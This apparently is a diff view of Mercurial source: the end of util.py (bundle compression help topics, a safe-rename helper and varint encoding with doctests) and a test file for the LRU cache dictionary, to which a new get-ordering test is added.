3852 """Obtains a list of available bundle compressions for use in help."""
3852 """Obtains a list of available bundle compressions for use in help."""
3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3854 items = {}
3854 items = {}
3855
3855
3856 # We need to format the docstring. So use a dummy object/type to hold it
3856 # We need to format the docstring. So use a dummy object/type to hold it
3857 # rather than mutating the original.
3857 # rather than mutating the original.
3858 class docobject(object):
3858 class docobject(object):
3859 pass
3859 pass
3860
3860
3861 for name in compengines:
3861 for name in compengines:
3862 engine = compengines[name]
3862 engine = compengines[name]
3863
3863
3864 if not engine.available():
3864 if not engine.available():
3865 continue
3865 continue
3866
3866
3867 bt = engine.bundletype()
3867 bt = engine.bundletype()
3868 if not bt or not bt[0]:
3868 if not bt or not bt[0]:
3869 continue
3869 continue
3870
3870
3871 doc = pycompat.sysstr('``%s``\n %s') % (
3871 doc = pycompat.sysstr('``%s``\n %s') % (
3872 bt[0], engine.bundletype.__doc__)
3872 bt[0], engine.bundletype.__doc__)
3873
3873
3874 value = docobject()
3874 value = docobject()
3875 value.__doc__ = doc
3875 value.__doc__ = doc
3876 value._origdoc = engine.bundletype.__doc__
3876 value._origdoc = engine.bundletype.__doc__
3877 value._origfunc = engine.bundletype
3877 value._origfunc = engine.bundletype
3878
3878
3879 items[bt[0]] = value
3879 items[bt[0]] = value
3880
3880
3881 return items
3881 return items
3882
3882
3883 i18nfunctions = bundlecompressiontopics().values()
3883 i18nfunctions = bundlecompressiontopics().values()
3884
3884
3885 # convenient shortcut
3885 # convenient shortcut
3886 dst = debugstacktrace
3886 dst = debugstacktrace
3887
3887
3888 def safename(f, tag, ctx, others=None):
3888 def safename(f, tag, ctx, others=None):
3889 """
3889 """
3890 Generate a name that it is safe to rename f to in the given context.
3890 Generate a name that it is safe to rename f to in the given context.
3891
3891
3892 f: filename to rename
3892 f: filename to rename
3893 tag: a string tag that will be included in the new name
3893 tag: a string tag that will be included in the new name
3894 ctx: a context, in which the new name must not exist
3894 ctx: a context, in which the new name must not exist
3895 others: a set of other filenames that the new name must not be in
3895 others: a set of other filenames that the new name must not be in
3896
3896
3897 Returns a file name of the form oldname~tag[~number] which does not exist
3897 Returns a file name of the form oldname~tag[~number] which does not exist
3898 in the provided context and is not in the set of other names.
3898 in the provided context and is not in the set of other names.
3899 """
3899 """
3900 if others is None:
3900 if others is None:
3901 others = set()
3901 others = set()
3902
3902
3903 fn = '%s~%s' % (f, tag)
3903 fn = '%s~%s' % (f, tag)
3904 if fn not in ctx and fn not in others:
3904 if fn not in ctx and fn not in others:
3905 return fn
3905 return fn
3906 for n in itertools.count(1):
3906 for n in itertools.count(1):
3907 fn = '%s~%s~%s' % (f, tag, n)
3907 fn = '%s~%s~%s' % (f, tag, n)
3908 if fn not in ctx and fn not in others:
3908 if fn not in ctx and fn not in others:
3909 return fn
3909 return fn
3910
3910
3911 def readexactly(stream, n):
3911 def readexactly(stream, n):
3912 '''read n bytes from stream.read and abort if less was available'''
3912 '''read n bytes from stream.read and abort if less was available'''
3913 s = stream.read(n)
3913 s = stream.read(n)
3914 if len(s) < n:
3914 if len(s) < n:
3915 raise error.Abort(_("stream ended unexpectedly"
3915 raise error.Abort(_("stream ended unexpectedly"
3916 " (got %d bytes, expected %d)")
3916 " (got %d bytes, expected %d)")
3917 % (len(s), n))
3917 % (len(s), n))
3918 return s
3918 return s
3919
3919
3920 def uvarintencode(value):
3920 def uvarintencode(value):
3921 """Encode an unsigned integer value to a varint.
3921 """Encode an unsigned integer value to a varint.
3922
3922
3923 A varint is a variable length integer of 1 or more bytes. Each byte
3923 A varint is a variable length integer of 1 or more bytes. Each byte
3924 except the last has the most significant bit set. The lower 7 bits of
3924 except the last has the most significant bit set. The lower 7 bits of
3925 each byte store the 2's complement representation, least significant group
3925 each byte store the 2's complement representation, least significant group
3926 first.
3926 first.
3927
3927
3928 >>> uvarintencode(0)
3928 >>> uvarintencode(0)
3929 '\\x00'
3929 '\\x00'
3930 >>> uvarintencode(1)
3930 >>> uvarintencode(1)
3931 '\\x01'
3931 '\\x01'
3932 >>> uvarintencode(127)
3932 >>> uvarintencode(127)
3933 '\\x7f'
3933 '\\x7f'
3934 >>> uvarintencode(1337)
3934 >>> uvarintencode(1337)
3935 '\\xb9\\n'
3935 '\\xb9\\n'
3936 >>> uvarintencode(65536)
3936 >>> uvarintencode(65536)
3937 '\\x80\\x80\\x04'
3937 '\\x80\\x80\\x04'
3938 >>> uvarintencode(-1)
3938 >>> uvarintencode(-1)
3939 Traceback (most recent call last):
3939 Traceback (most recent call last):
3940 ...
3940 ...
3941 ProgrammingError: negative value for uvarint: -1
3941 ProgrammingError: negative value for uvarint: -1
3942 """
3942 """
3943 if value < 0:
3943 if value < 0:
3944 raise error.ProgrammingError('negative value for uvarint: %d'
3944 raise error.ProgrammingError('negative value for uvarint: %d'
3945 % value)
3945 % value)
3946 bits = value & 0x7f
3946 bits = value & 0x7f
3947 value >>= 7
3947 value >>= 7
3948 bytes = []
3948 bytes = []
3949 while value:
3949 while value:
3950 bytes.append(pycompat.bytechr(0x80 | bits))
3950 bytes.append(pycompat.bytechr(0x80 | bits))
3951 bits = value & 0x7f
3951 bits = value & 0x7f
3952 value >>= 7
3952 value >>= 7
3953 bytes.append(pycompat.bytechr(bits))
3953 bytes.append(pycompat.bytechr(bits))
3954
3954
3955 return ''.join(bytes)
3955 return ''.join(bytes)
3956
3956
3957 def uvarintdecodestream(fh):
3957 def uvarintdecodestream(fh):
3958 """Decode an unsigned variable length integer from a stream.
3958 """Decode an unsigned variable length integer from a stream.
3959
3959
3960 The passed argument is anything that has a ``.read(N)`` method.
3960 The passed argument is anything that has a ``.read(N)`` method.
3961
3961
3962 >>> try:
3962 >>> try:
3963 ... from StringIO import StringIO as BytesIO
3963 ... from StringIO import StringIO as BytesIO
3964 ... except ImportError:
3964 ... except ImportError:
3965 ... from io import BytesIO
3965 ... from io import BytesIO
3966 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3966 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3967 0
3967 0
3968 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3968 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3969 1
3969 1
3970 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3970 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3971 127
3971 127
3972 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3972 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3973 1337
3973 1337
3974 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3974 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3975 65536
3975 65536
3976 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3976 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3977 Traceback (most recent call last):
3977 Traceback (most recent call last):
3978 ...
3978 ...
3979 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3979 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3980 """
3980 """
3981 result = 0
3981 result = 0
3982 shift = 0
3982 shift = 0
3983 while True:
3983 while True:
3984 byte = ord(readexactly(fh, 1))
3984 byte = ord(readexactly(fh, 1))
3985 result |= ((byte & 0x7f) << shift)
3985 result |= ((byte & 0x7f) << shift)
3986 if not (byte & 0x80):
3986 if not (byte & 0x80):
3987 return result
3987 return result
3988 shift += 7
3988 shift += 7
@@ -1,325 +1,337
1 from __future__ import absolute_import, print_function
1 from __future__ import absolute_import, print_function
2
2
3 import unittest
3 import unittest
4
4
5 import silenttestrunner
5 import silenttestrunner
6
6
7 from mercurial import (
7 from mercurial import (
8 util,
8 util,
9 )
9 )
10
10
11 class testlrucachedict(unittest.TestCase):
11 class testlrucachedict(unittest.TestCase):
12 def testsimple(self):
12 def testsimple(self):
13 d = util.lrucachedict(4)
13 d = util.lrucachedict(4)
14 self.assertEqual(d.capacity, 4)
14 self.assertEqual(d.capacity, 4)
15 d.insert('a', 'va', cost=2)
15 d.insert('a', 'va', cost=2)
16 d['b'] = 'vb'
16 d['b'] = 'vb'
17 d['c'] = 'vc'
17 d['c'] = 'vc'
18 d.insert('d', 'vd', cost=42)
18 d.insert('d', 'vd', cost=42)
19
19
20 self.assertEqual(d['a'], 'va')
20 self.assertEqual(d['a'], 'va')
21 self.assertEqual(d['b'], 'vb')
21 self.assertEqual(d['b'], 'vb')
22 self.assertEqual(d['c'], 'vc')
22 self.assertEqual(d['c'], 'vc')
23 self.assertEqual(d['d'], 'vd')
23 self.assertEqual(d['d'], 'vd')
24
24
25 self.assertEqual(d.totalcost, 44)
25 self.assertEqual(d.totalcost, 44)
26
26
27 # 'a' should be dropped because it was least recently used.
27 # 'a' should be dropped because it was least recently used.
28 d['e'] = 've'
28 d['e'] = 've'
29 self.assertNotIn('a', d)
29 self.assertNotIn('a', d)
30 self.assertIsNone(d.get('a'))
30 self.assertIsNone(d.get('a'))
31 self.assertEqual(d.totalcost, 42)
31 self.assertEqual(d.totalcost, 42)
32
32
33 self.assertEqual(d['b'], 'vb')
33 self.assertEqual(d['b'], 'vb')
34 self.assertEqual(d['c'], 'vc')
34 self.assertEqual(d['c'], 'vc')
35 self.assertEqual(d['d'], 'vd')
35 self.assertEqual(d['d'], 'vd')
36 self.assertEqual(d['e'], 've')
36 self.assertEqual(d['e'], 've')
37
37
38 # Replacing item with different cost adjusts totalcost.
38 # Replacing item with different cost adjusts totalcost.
39 d.insert('e', 've', cost=4)
39 d.insert('e', 've', cost=4)
40 self.assertEqual(d.totalcost, 46)
40 self.assertEqual(d.totalcost, 46)
41
41
42 # Touch entries in some order (both get and set).
42 # Touch entries in some order (both get and set).
43 d['e']
43 d['e']
44 d['c'] = 'vc2'
44 d['c'] = 'vc2'
45 d['d']
45 d['d']
46 d['b'] = 'vb2'
46 d['b'] = 'vb2'
47
47
48 # 'e' should be dropped now
48 # 'e' should be dropped now
49 d['f'] = 'vf'
49 d['f'] = 'vf'
50 self.assertNotIn('e', d)
50 self.assertNotIn('e', d)
51 self.assertEqual(d['b'], 'vb2')
51 self.assertEqual(d['b'], 'vb2')
52 self.assertEqual(d['c'], 'vc2')
52 self.assertEqual(d['c'], 'vc2')
53 self.assertEqual(d['d'], 'vd')
53 self.assertEqual(d['d'], 'vd')
54 self.assertEqual(d['f'], 'vf')
54 self.assertEqual(d['f'], 'vf')
55
55
56 d.clear()
56 d.clear()
57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 self.assertNotIn(key, d)
58 self.assertNotIn(key, d)
59
59
60 def testunfull(self):
60 def testunfull(self):
61 d = util.lrucachedict(4)
61 d = util.lrucachedict(4)
62 d['a'] = 1
62 d['a'] = 1
63 d['b'] = 2
63 d['b'] = 2
64 d['a']
64 d['a']
65 d['b']
65 d['b']
66
66
67 for key in ('a', 'b'):
67 for key in ('a', 'b'):
68 self.assertIn(key, d)
68 self.assertIn(key, d)
69
69
70 def testget(self):
71 d = util.lrucachedict(4)
72 d['a'] = 'va'
73 d['b'] = 'vb'
74 d['c'] = 'vc'
75
76 self.assertIsNone(d.get('missing'))
77 self.assertEqual(list(d), ['c', 'b', 'a'])
78
79 self.assertEqual(d.get('a'), 'va')
80 self.assertEqual(list(d), ['a', 'c', 'b'])
81
70 def testcopypartial(self):
82 def testcopypartial(self):
71 d = util.lrucachedict(4)
83 d = util.lrucachedict(4)
72 d.insert('a', 'va', cost=4)
84 d.insert('a', 'va', cost=4)
73 d.insert('b', 'vb', cost=2)
85 d.insert('b', 'vb', cost=2)
74
86
75 dc = d.copy()
87 dc = d.copy()
76
88
77 self.assertEqual(len(dc), 2)
89 self.assertEqual(len(dc), 2)
78 self.assertEqual(dc.totalcost, 6)
90 self.assertEqual(dc.totalcost, 6)
79 for key in ('a', 'b'):
91 for key in ('a', 'b'):
80 self.assertIn(key, dc)
92 self.assertIn(key, dc)
81 self.assertEqual(dc[key], 'v%s' % key)
93 self.assertEqual(dc[key], 'v%s' % key)
82
94
83 self.assertEqual(len(d), 2)
95 self.assertEqual(len(d), 2)
84 for key in ('a', 'b'):
96 for key in ('a', 'b'):
85 self.assertIn(key, d)
97 self.assertIn(key, d)
86 self.assertEqual(d[key], 'v%s' % key)
98 self.assertEqual(d[key], 'v%s' % key)
87
99
88 d['c'] = 'vc'
100 d['c'] = 'vc'
89 del d['b']
101 del d['b']
90 self.assertEqual(d.totalcost, 4)
102 self.assertEqual(d.totalcost, 4)
91 dc = d.copy()
103 dc = d.copy()
92 self.assertEqual(len(dc), 2)
104 self.assertEqual(len(dc), 2)
93 self.assertEqual(dc.totalcost, 4)
105 self.assertEqual(dc.totalcost, 4)
94 for key in ('a', 'c'):
106 for key in ('a', 'c'):
95 self.assertIn(key, dc)
107 self.assertIn(key, dc)
96 self.assertEqual(dc[key], 'v%s' % key)
108 self.assertEqual(dc[key], 'v%s' % key)
97
109
98 def testcopyempty(self):
110 def testcopyempty(self):
99 d = util.lrucachedict(4)
111 d = util.lrucachedict(4)
100 dc = d.copy()
112 dc = d.copy()
101 self.assertEqual(len(dc), 0)
113 self.assertEqual(len(dc), 0)
102
114
103 def testcopyfull(self):
115 def testcopyfull(self):
104 d = util.lrucachedict(4)
116 d = util.lrucachedict(4)
105 d.insert('a', 'va', cost=42)
117 d.insert('a', 'va', cost=42)
106 d['b'] = 'vb'
118 d['b'] = 'vb'
107 d['c'] = 'vc'
119 d['c'] = 'vc'
108 d['d'] = 'vd'
120 d['d'] = 'vd'
109
121
110 dc = d.copy()
122 dc = d.copy()
111
123
112 for key in ('a', 'b', 'c', 'd'):
124 for key in ('a', 'b', 'c', 'd'):
113 self.assertIn(key, dc)
125 self.assertIn(key, dc)
114 self.assertEqual(dc[key], 'v%s' % key)
126 self.assertEqual(dc[key], 'v%s' % key)
115
127
116 self.assertEqual(d.totalcost, 42)
128 self.assertEqual(d.totalcost, 42)
117 self.assertEqual(dc.totalcost, 42)
129 self.assertEqual(dc.totalcost, 42)
118
130
119 # 'a' should be dropped because it was least recently used.
131 # 'a' should be dropped because it was least recently used.
120 dc['e'] = 've'
132 dc['e'] = 've'
121 self.assertNotIn('a', dc)
133 self.assertNotIn('a', dc)
122 for key in ('b', 'c', 'd', 'e'):
134 for key in ('b', 'c', 'd', 'e'):
123 self.assertIn(key, dc)
135 self.assertIn(key, dc)
124 self.assertEqual(dc[key], 'v%s' % key)
136 self.assertEqual(dc[key], 'v%s' % key)
125
137
126 self.assertEqual(d.totalcost, 42)
138 self.assertEqual(d.totalcost, 42)
127 self.assertEqual(dc.totalcost, 0)
139 self.assertEqual(dc.totalcost, 0)
128
140
129 # Contents and order of original dict should remain unchanged.
141 # Contents and order of original dict should remain unchanged.
130 dc['b'] = 'vb_new'
142 dc['b'] = 'vb_new'
131
143
132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
144 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
133 for key in ('a', 'b', 'c', 'd'):
145 for key in ('a', 'b', 'c', 'd'):
134 self.assertEqual(d[key], 'v%s' % key)
146 self.assertEqual(d[key], 'v%s' % key)
135
147
136 d = util.lrucachedict(4, maxcost=42)
148 d = util.lrucachedict(4, maxcost=42)
137 d.insert('a', 'va', cost=5)
149 d.insert('a', 'va', cost=5)
138 d.insert('b', 'vb', cost=4)
150 d.insert('b', 'vb', cost=4)
139 d.insert('c', 'vc', cost=3)
151 d.insert('c', 'vc', cost=3)
140 dc = d.copy()
152 dc = d.copy()
141 self.assertEqual(dc.maxcost, 42)
153 self.assertEqual(dc.maxcost, 42)
142 self.assertEqual(len(dc), 3)
154 self.assertEqual(len(dc), 3)
143
155
144 # Max cost can be lowered as part of copy.
156 # Max cost can be lowered as part of copy.
145 dc = d.copy(maxcost=10)
157 dc = d.copy(maxcost=10)
146 self.assertEqual(dc.maxcost, 10)
158 self.assertEqual(dc.maxcost, 10)
147 self.assertEqual(len(dc), 2)
159 self.assertEqual(len(dc), 2)
148 self.assertEqual(dc.totalcost, 7)
160 self.assertEqual(dc.totalcost, 7)
149 self.assertIn('b', dc)
161 self.assertIn('b', dc)
150 self.assertIn('c', dc)
162 self.assertIn('c', dc)
151
163
152 def testcopydecreasecapacity(self):
164 def testcopydecreasecapacity(self):
153 d = util.lrucachedict(5)
165 d = util.lrucachedict(5)
154 d.insert('a', 'va', cost=4)
166 d.insert('a', 'va', cost=4)
155 d.insert('b', 'vb', cost=2)
167 d.insert('b', 'vb', cost=2)
156 d['c'] = 'vc'
168 d['c'] = 'vc'
157 d['d'] = 'vd'
169 d['d'] = 'vd'
158
170
159 dc = d.copy(2)
171 dc = d.copy(2)
160 self.assertEqual(dc.totalcost, 0)
172 self.assertEqual(dc.totalcost, 0)
161 for key in ('a', 'b'):
173 for key in ('a', 'b'):
162 self.assertNotIn(key, dc)
174 self.assertNotIn(key, dc)
163 for key in ('c', 'd'):
175 for key in ('c', 'd'):
164 self.assertIn(key, dc)
176 self.assertIn(key, dc)
165 self.assertEqual(dc[key], 'v%s' % key)
177 self.assertEqual(dc[key], 'v%s' % key)
166
178
167 dc.insert('e', 've', cost=7)
179 dc.insert('e', 've', cost=7)
168 self.assertEqual(dc.totalcost, 7)
180 self.assertEqual(dc.totalcost, 7)
169 self.assertNotIn('c', dc)
181 self.assertNotIn('c', dc)
170 for key in ('d', 'e'):
182 for key in ('d', 'e'):
171 self.assertIn(key, dc)
183 self.assertIn(key, dc)
172 self.assertEqual(dc[key], 'v%s' % key)
184 self.assertEqual(dc[key], 'v%s' % key)
173
185
174 # Original should remain unchanged.
186 # Original should remain unchanged.
175 self.assertEqual(d.totalcost, 6)
187 self.assertEqual(d.totalcost, 6)
176 for key in ('a', 'b', 'c', 'd'):
188 for key in ('a', 'b', 'c', 'd'):
177 self.assertIn(key, d)
189 self.assertIn(key, d)
178 self.assertEqual(d[key], 'v%s' % key)
190 self.assertEqual(d[key], 'v%s' % key)
179
191
180 def testcopyincreasecapacity(self):
192 def testcopyincreasecapacity(self):
181 d = util.lrucachedict(5)
193 d = util.lrucachedict(5)
182 d['a'] = 'va'
194 d['a'] = 'va'
183 d['b'] = 'vb'
195 d['b'] = 'vb'
184 d['c'] = 'vc'
196 d['c'] = 'vc'
185 d['d'] = 'vd'
197 d['d'] = 'vd'
186
198
187 dc = d.copy(6)
199 dc = d.copy(6)
188 for key in ('a', 'b', 'c', 'd'):
200 for key in ('a', 'b', 'c', 'd'):
189 self.assertIn(key, dc)
201 self.assertIn(key, dc)
190 self.assertEqual(dc[key], 'v%s' % key)
202 self.assertEqual(dc[key], 'v%s' % key)
191
203
192 dc['e'] = 've'
204 dc['e'] = 've'
193 dc['f'] = 'vf'
205 dc['f'] = 'vf'
194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
206 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
195 self.assertIn(key, dc)
207 self.assertIn(key, dc)
196 self.assertEqual(dc[key], 'v%s' % key)
208 self.assertEqual(dc[key], 'v%s' % key)
197
209
198 dc['g'] = 'vg'
210 dc['g'] = 'vg'
199 self.assertNotIn('a', dc)
211 self.assertNotIn('a', dc)
200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
212 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
201 self.assertIn(key, dc)
213 self.assertIn(key, dc)
202 self.assertEqual(dc[key], 'v%s' % key)
214 self.assertEqual(dc[key], 'v%s' % key)
203
215
204 # Original should remain unchanged.
216 # Original should remain unchanged.
205 for key in ('a', 'b', 'c', 'd'):
217 for key in ('a', 'b', 'c', 'd'):
206 self.assertIn(key, d)
218 self.assertIn(key, d)
207 self.assertEqual(d[key], 'v%s' % key)
219 self.assertEqual(d[key], 'v%s' % key)
208
220
209 def testpopoldest(self):
221 def testpopoldest(self):
210 d = util.lrucachedict(4)
222 d = util.lrucachedict(4)
211 d.insert('a', 'va', cost=10)
223 d.insert('a', 'va', cost=10)
212 d.insert('b', 'vb', cost=5)
224 d.insert('b', 'vb', cost=5)
213
225
214 self.assertEqual(len(d), 2)
226 self.assertEqual(len(d), 2)
215 self.assertEqual(d.popoldest(), ('a', 'va'))
227 self.assertEqual(d.popoldest(), ('a', 'va'))
216 self.assertEqual(len(d), 1)
228 self.assertEqual(len(d), 1)
217 self.assertEqual(d.totalcost, 5)
229 self.assertEqual(d.totalcost, 5)
218 self.assertEqual(d.popoldest(), ('b', 'vb'))
230 self.assertEqual(d.popoldest(), ('b', 'vb'))
219 self.assertEqual(len(d), 0)
231 self.assertEqual(len(d), 0)
220 self.assertEqual(d.totalcost, 0)
232 self.assertEqual(d.totalcost, 0)
221 self.assertIsNone(d.popoldest())
233 self.assertIsNone(d.popoldest())
222
234
223 d['a'] = 'va'
235 d['a'] = 'va'
224 d['b'] = 'vb'
236 d['b'] = 'vb'
225 d['c'] = 'vc'
237 d['c'] = 'vc'
226 d['d'] = 'vd'
238 d['d'] = 'vd'
227
239
228 self.assertEqual(d.popoldest(), ('a', 'va'))
240 self.assertEqual(d.popoldest(), ('a', 'va'))
229 self.assertEqual(len(d), 3)
241 self.assertEqual(len(d), 3)
230 for key in ('b', 'c', 'd'):
242 for key in ('b', 'c', 'd'):
231 self.assertEqual(d[key], 'v%s' % key)
243 self.assertEqual(d[key], 'v%s' % key)
232
244
233 d['a'] = 'va'
245 d['a'] = 'va'
234 self.assertEqual(d.popoldest(), ('b', 'vb'))
246 self.assertEqual(d.popoldest(), ('b', 'vb'))
235
247
236 def testmaxcost(self):
248 def testmaxcost(self):
237 # Item cost is zero by default.
249 # Item cost is zero by default.
238 d = util.lrucachedict(6, maxcost=10)
250 d = util.lrucachedict(6, maxcost=10)
239 d['a'] = 'va'
251 d['a'] = 'va'
240 d['b'] = 'vb'
252 d['b'] = 'vb'
241 d['c'] = 'vc'
253 d['c'] = 'vc'
242 d['d'] = 'vd'
254 d['d'] = 'vd'
243 self.assertEqual(len(d), 4)
255 self.assertEqual(len(d), 4)
244 self.assertEqual(d.totalcost, 0)
256 self.assertEqual(d.totalcost, 0)
245
257
246 d.clear()
258 d.clear()
247
259
248 # Insertion to exact cost threshold works without eviction.
260 # Insertion to exact cost threshold works without eviction.
249 d.insert('a', 'va', cost=6)
261 d.insert('a', 'va', cost=6)
250 d.insert('b', 'vb', cost=4)
262 d.insert('b', 'vb', cost=4)
251
263
252 self.assertEqual(len(d), 2)
264 self.assertEqual(len(d), 2)
253 self.assertEqual(d['a'], 'va')
265 self.assertEqual(d['a'], 'va')
254 self.assertEqual(d['b'], 'vb')
266 self.assertEqual(d['b'], 'vb')
255
267
256 # Inserting a new element with 0 cost works.
268 # Inserting a new element with 0 cost works.
257 d['c'] = 'vc'
269 d['c'] = 'vc'
258 self.assertEqual(len(d), 3)
270 self.assertEqual(len(d), 3)
259
271
260 # Inserting a new element with cost putting us above high
272 # Inserting a new element with cost putting us above high
261 # water mark evicts oldest single item.
273 # water mark evicts oldest single item.
262 d.insert('d', 'vd', cost=1)
274 d.insert('d', 'vd', cost=1)
263 self.assertEqual(len(d), 3)
275 self.assertEqual(len(d), 3)
264 self.assertEqual(d.totalcost, 5)
276 self.assertEqual(d.totalcost, 5)
265 self.assertNotIn('a', d)
277 self.assertNotIn('a', d)
266 for key in ('b', 'c', 'd'):
278 for key in ('b', 'c', 'd'):
267 self.assertEqual(d[key], 'v%s' % key)
279 self.assertEqual(d[key], 'v%s' % key)
268
280
269 # Inserting a new element with enough room for just itself
281 # Inserting a new element with enough room for just itself
270 # evicts all items before.
282 # evicts all items before.
271 d.insert('e', 've', cost=10)
283 d.insert('e', 've', cost=10)
272 self.assertEqual(len(d), 1)
284 self.assertEqual(len(d), 1)
273 self.assertEqual(d.totalcost, 10)
285 self.assertEqual(d.totalcost, 10)
274 self.assertIn('e', d)
286 self.assertIn('e', d)
275
287
276 # Inserting a new element with cost greater than threshold
288 # Inserting a new element with cost greater than threshold
277 # still retains that item.
289 # still retains that item.
278 d.insert('f', 'vf', cost=11)
290 d.insert('f', 'vf', cost=11)
279 self.assertEqual(len(d), 1)
291 self.assertEqual(len(d), 1)
280 self.assertEqual(d.totalcost, 11)
292 self.assertEqual(d.totalcost, 11)
281 self.assertIn('f', d)
293 self.assertIn('f', d)
282
294
283 # Inserting a new element will evict the last item since it is
295 # Inserting a new element will evict the last item since it is
284 # too large.
296 # too large.
285 d['g'] = 'vg'
297 d['g'] = 'vg'
286 self.assertEqual(len(d), 1)
298 self.assertEqual(len(d), 1)
287 self.assertEqual(d.totalcost, 0)
299 self.assertEqual(d.totalcost, 0)
288 self.assertIn('g', d)
300 self.assertIn('g', d)
289
301
290 d.clear()
302 d.clear()
291
303
292 d.insert('a', 'va', cost=7)
304 d.insert('a', 'va', cost=7)
293 d.insert('b', 'vb', cost=3)
305 d.insert('b', 'vb', cost=3)
294 self.assertEqual(len(d), 2)
306 self.assertEqual(len(d), 2)
295
307
296 # Replacing a value with smaller cost won't result in eviction.
308 # Replacing a value with smaller cost won't result in eviction.
297 d.insert('b', 'vb2', cost=2)
309 d.insert('b', 'vb2', cost=2)
298 self.assertEqual(len(d), 2)
310 self.assertEqual(len(d), 2)
299
311
300 # Replacing a value with a higher cost will evict when threshold
312 # Replacing a value with a higher cost will evict when threshold
301 # exceeded.
313 # exceeded.
302 d.insert('b', 'vb3', cost=4)
314 d.insert('b', 'vb3', cost=4)
303 self.assertEqual(len(d), 1)
315 self.assertEqual(len(d), 1)
304 self.assertNotIn('a', d)
316 self.assertNotIn('a', d)
305
317
306 def testmaxcostcomplex(self):
318 def testmaxcostcomplex(self):
307 d = util.lrucachedict(100, maxcost=100)
319 d = util.lrucachedict(100, maxcost=100)
308 d.insert('a', 'va', cost=9)
320 d.insert('a', 'va', cost=9)
309 d.insert('b', 'vb', cost=21)
321 d.insert('b', 'vb', cost=21)
310 d.insert('c', 'vc', cost=7)
322 d.insert('c', 'vc', cost=7)
311 d.insert('d', 'vc', cost=50)
323 d.insert('d', 'vc', cost=50)
312 self.assertEqual(d.totalcost, 87)
324 self.assertEqual(d.totalcost, 87)
313
325
314 # Inserting new element should free multiple elements so we hit
326 # Inserting new element should free multiple elements so we hit
315 # low water mark.
327 # low water mark.
316 d.insert('e', 'vd', cost=25)
328 d.insert('e', 'vd', cost=25)
317 self.assertEqual(len(d), 2)
329 self.assertEqual(len(d), 2)
318 self.assertNotIn('a', d)
330 self.assertNotIn('a', d)
319 self.assertNotIn('b', d)
331 self.assertNotIn('b', d)
320 self.assertNotIn('c', d)
332 self.assertNotIn('c', d)
321 self.assertIn('d', d)
333 self.assertIn('d', d)
322 self.assertIn('e', d)
334 self.assertIn('e', d)
323
335
324 if __name__ == '__main__':
336 if __name__ == '__main__':
325 silenttestrunner.main(__name__)
337 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now